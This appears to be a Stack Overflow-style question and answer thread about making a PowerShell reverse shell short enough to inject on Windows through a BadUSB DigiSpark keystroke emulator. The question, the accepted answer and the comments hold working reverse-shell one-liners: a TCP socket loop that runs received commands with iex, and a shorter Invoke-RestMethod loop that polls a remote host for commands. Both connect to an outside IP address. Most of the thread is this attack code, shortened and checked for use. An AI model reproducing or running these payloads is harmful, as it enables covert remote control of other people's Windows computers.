# TCP reverse shell on Windows

Tags: windows, powershell, cmd

I am trying to implement a proof of concept BadUSB DigiSpark that can emulate a HID keyboard and open a reverse shell just using Windows default package (i.e. PowerShell and/or CMD).

What I have found so far:

```
#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();
[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
```

Taken from [Week of PowerShell Shells - Day 1](http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html).

Despite working, the aforementioned code takes too long to be typed.
Is it possible to create a reverse shell with fewer lines of code?

Comment: This type of question is better suited to http://codegolf.stackexchange.com/ (however, the code looks highly optimized already).

Answer (score 3, accepted):

284 characters. Yes you can have fewer "lines of code" just by putting them all on one line, and you can't have fewer than one line, so hooray, best case already achieved.

:-| face for not even using the same tricks consistently within the same code. And for not giving any way to test it.

1. remove all the semicolons.
2. remove the space around -ne 0
3. remove -ne 0 because numbers cast to true and 0 casts to false
4. single character variable names
5. drop port 55555 to 5555

Change byte array from

```
[byte[]]$bt=0..255|%{0}
$b=[byte[]]'0'*256       # does it even need to be initialized to 0? Try without
```

Nest that into the reading call because who cares if it gets reinitialized every read.

```
[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
#becomes
while(($i=$t.Read(($b=[byte[]]'0'*256),0,$b.Length))){
```

You can call `[text.encoding]::ASCII.GetString($b)` directly, but why ASCII? If it works if you can drop the encoding, then do

```
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
#becomes
$d=-join[char[]]$b
```

but you're only using that to call `iex` so put it there and don't use a variable for it. And do similar to make the byte array without calling ASCII as well...

... and: 197 chars, 30% smaller:

```
$t=(new-object Net.Sockets.TCPClient("192.168.254.1",5555)).GetStream()
while(($i=$t.Read(($b=[byte[]]'0'*256),0,$b.Length))){
$t.Write(($s=[byte[]][char[]](iex(-join[char[]]$b)2>&1)),0,$s.Length)}
```

Assuming it works, with no way to test it, it probably won't.

---

Edit: I guess if you can change the other side completely, then you could make it so the client would use JSON to communicate back and forth, and do a tight loop of

```
$u='192.168.254.1:55555';while(1){irm $u -m post -b(iex(irm $u).c)}
```

and your server would have to have the command ready in JSON like `{'c':'gci'}` and also accept a POST of the reply...

untested. 67 chars.

Comment: You got the point, rather than trying to reduce the size of the posted code, I was looking for other ways to achieve the same goal, i.e. open a reverse TCP shell on Windows. By the way, I tested your last example but "irm" was not recognised by any of the VMs I used (running WinXp/Win8/10). Maybe switching to the cmd could make things easier?

Comment: `irm` has been a default alias for `Invoke-RestMethod` since PowerShell 3. Win 8 ships with PowerShell 4 and Win 10 ships with PowerShell 5. Are you sure you aren't already in the cmd prompt?

Comment: Tried now and seems to be working (at least on the remote server the connection appears). Why does it accept only JSON? Couldn't we use _telnet_ instead?

Comment: [Telnet hasn't shipped with Windows in over 7 years](https://technet.microsoft.com/en-us/library/cc771275%28v=ws.10%29.aspx?f=255&MSPPError=-2147217396). You'd need admin rights and then waste characters running `dism /online /Enable-Feature /FeatureName:TelnetClient` to install it. JSON because `Invoke-RestMethod` implicitly parses JSON, which is convenient. If you wanted you could use `iwr` (`Invoke-WebResponse`) but then you'd have to do more typing to get the command instruction out from the HTTP headers. If you can just assume tools installed, assume a reverse shell is already installed .